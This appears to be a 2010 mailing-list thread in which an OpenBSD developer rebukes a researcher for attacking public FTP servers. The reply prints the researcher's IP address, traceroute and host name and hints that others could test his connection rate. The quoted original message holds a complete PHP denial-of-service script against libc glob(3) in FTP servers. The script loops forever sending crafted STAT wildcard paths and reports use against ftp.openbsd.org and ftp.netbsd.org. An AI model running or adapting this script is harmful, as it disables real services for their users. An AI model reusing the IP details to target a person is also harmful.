It's rather astonishing what attempts to passfor a credible security advisory today.
"oh, I made a lot of connections to the site and they blocked me." Thank you, Maksymillian, for showing us all that you can execute a denial of service attack from 90.156.82.13. I wonder how many connections his site supports to his services. perhaps some similar "security expert" can test his connection rate and let us all know. # traceroute -n 90.156.82.13 traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets 1 129.128.5.2 6.906 ms 0.818 ms 1.444 ms 2 129.128.3.194 0.306 ms 0.303 ms 0.306 ms 3 129.128.3.130 0.345 ms 0.502 ms 0.656 ms 4 129.128.3.170 0.502 ms 0.726 ms 1.443 ms 5 64.42.209.114 5.628 ms 5.562 ms 5.272 ms 6 216.18.32.13 6.337 ms 5.676 ms 5.752 ms 7 66.59.190.198 18.936 ms 19.18 ms 18.523 ms 8 66.59.190.18 18.384 ms 18.659 ms 18.426 ms 9 67.69.199.105 17.797 ms 17.785 ms 18.111 ms 10 64.86.115.13 17.369 ms 17.651 ms 17.175 ms 11 216.6.98.29 68.828 ms 69.162 ms 69.146 ms 12 216.6.57.9 87.943 ms 87.828 ms 87.879 ms 13 195.219.69.29 175.930 ms 176.47 ms 175.804 ms 14 195.219.69.2 189.366 ms 176.757 ms 179.460 ms 15 195.219.180.6 193.562 ms 197.755 ms 197.880 ms 16 195.219.246.2 181.461 ms 201.536 ms 179.635 ms 17 83.238.251.56 177.432 ms 177.971 ms 177.115 ms 18 83.238.250.38 189.741 ms 190.70 ms 189.646 ms 19 83.238.250.12 191.123 ms 193.99 ms 192.135 ms 20 83.238.251.41 189.843 ms 189.805 ms 189.245 ms 21 87.204.248.202 188.981 ms 189.167 ms 459.987 ms 22 87.99.33.90 190.739 ms 190.637 ms 190.955 ms 23 87.99.32.202 190.180 ms 190.271 ms 190.160 ms 24 90.156.82.13 289.39 ms 331.276 ms 319.419 ms ^C # host 90.156.82.13 13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl. # On 2 July 2010 15:47, Theo de Raadt <dera...@cvs.openbsd.org> wrote: > OK, I am letting the maintainer of the site know, at the University Campus > that you have just executed a denial of service against. > > I am surprised that you would go out of your way to declare so freely > that you have purposely participated in a denial of service. > >> Return-Path: c...@securityreason.com >> Delivery-Date: Fri Jul 2 15:38:24 2010 >> Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163]) >> by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472 >> (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL) >> for <dera...@cvs.openbsd.org>; Fri, 2 Jul 2010 15:38:24 -0600 (MDT) >> Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8]) >> by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931 >> for <dera...@openbsd.org>; Fri, 2 Jul 2010 15:38:17 -0600 (MDT) >> Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1]) >> by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70) >> id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200 >> Message-ID: <4c2e4e40.4080...@securityreason.com> >> Date: Fri, 02 Jul 2010 22:38:24 +0200 >> From: Maksymilian Arciemowicz <c...@securityreason.com> >> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10) Gecko/20100512 Thunderbird/3.0.5 >> MIME-Version: 1.0 >> To: dera...@openbsd.org, secur...@openbsd.org >> Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org >> X-Enigmail-Version: 1.0.1 >> Content-Type: text/plain; charset=ISO-8859-1 >> Content-Transfer-Encoding: 7bit >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> <?php >> >> /* Libc/glob(3) denial-of-service >> Maksymilian Arciemowicz from SecurityReason.com >> >> This script has been used to attack ftp.openbsd.org and ftp.netbsd.org >> >> Result (ftp.openbsd.org): >> - - Connection refused >> >> and in the end >> >> # telnet ftp.openbsd.org 21 >> Trying 129.128.5.191... >> Connected to ftp.openbsd.org. >> Escape character is '^]'. >> 421- If you are seeing this message you have been blocked from using >> 421- this ftp server - most likely for mirroring content without paying >> 421- attention to what you were mirroring or where you should be mirroring >> 421- it from, or for excessive connection rates. >> 421- OpenBSD should *NOT* be mirrored from here, you should use >> 421- a second level mirror as described in http://www.openbsd.org/ftp.html >> 421 >> >> Connection closed by foreign host. >> # >> >> ;] >> >> Result (ftp.netbsd.org): >> - - no more access for anonymous >> >> On 02.07.2010 20:29 CET, ftp.netbsd.org has return: >> 530 User ftp access denied, connection limit of 160 reached. >> >> >> Affter attack from one host >> >> */ >> >> $conf['host']= $argv[1] ? $argv[1] : "HOST"; >> $conf['user'] =$argv[2] ? $argv[2] : "anonymous"; >> $conf['pass'] =$argv[3] ? $argv[3] : "m...@cxib.net"; >> $conf['port']= $argv[4] ? $argv[4] : 21; >> >> $dirnames=array('A', 'B', 'C', 'D', >> 'E','F','G','H','I','J','K','M','N','O','P'); >> $pathsent="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{ ..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c x"; >> >> // fts_levelsumary >> $fts_level=2; >> >> $created_directories=true; >> >> function attackglobinftp(){ >> global $conf; >> global $dirnames; >> global $pathsent; >> global $fts_level; >> global $created_directories; >> >> if (isset($conf['port']) and >> ($socket=socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) and >> (socket_connect($socket, $conf['host'], $conf['port']))){ >> >> echo "New connection opened\n"; >> socket_write($socket, "USER ".$conf['user']."\nPASS ".$conf['pass']."\n"); >> >> if(!$created_directories) >> for($stagc=0;$stagc < count($dirnames);$stagc++){ >> for($ssdc=2;$ssdc--;){ >> socket_write($socket, "MKD ".$dirnames[$stagc]."\nCWD >> ".$dirnames[$stagc]."\n"); >> echo "MKD ".$dirnames[$stagc]."\nCWD ".$dirnames[$stagc]." for \n"; >> echo socket_read($socket,10204); >> echo $ssdc."\n"; >> } >> for($ssdc=256;$ssdc--;){ >> socket_write($socket, "cwd ..\n"); >> echo socket_read($socket,10000); >> } >> } >> $created_directories=true; >> >> >> for($aoi=1; $aoi--; >> ){ >> socket_write($socket, "STAT ".$pathsent."\n"); >> echo "sent: STAT ".$pathsent."s\n"; >> } >> sleep(5); >> } else >> echo "Unable to connect\n"; >> >> } >> >> while(1) >> attackglobinftp(); >> ?> >> >> >> - -- >> Best Regards, >> - ------------------------ >> pub 1024D/A6986BD6 2008-08-22 >> uid Maksymilian Arciemowicz (cxib) >> <c...@securityreason.com> >> sub 4096g/0889FA9A 2008-08-22 >> >> http://securityreason.com >> http://securityreason.com/key/Arciemowicz.Maksymilian.gpg >> -----BEGIN PGP SIGNATURE----- >> >> iEYEARECAAYFAkwuTkAACgkQpiCeOKaYa9aafQCeNCpKgH3qFz0HscgNJ/JEunyS >> I0EAnAxEcaMFSq4Kl0x3NSqzeuV1SP3p >> =lx/r >> -----END PGP SIGNATURE-----
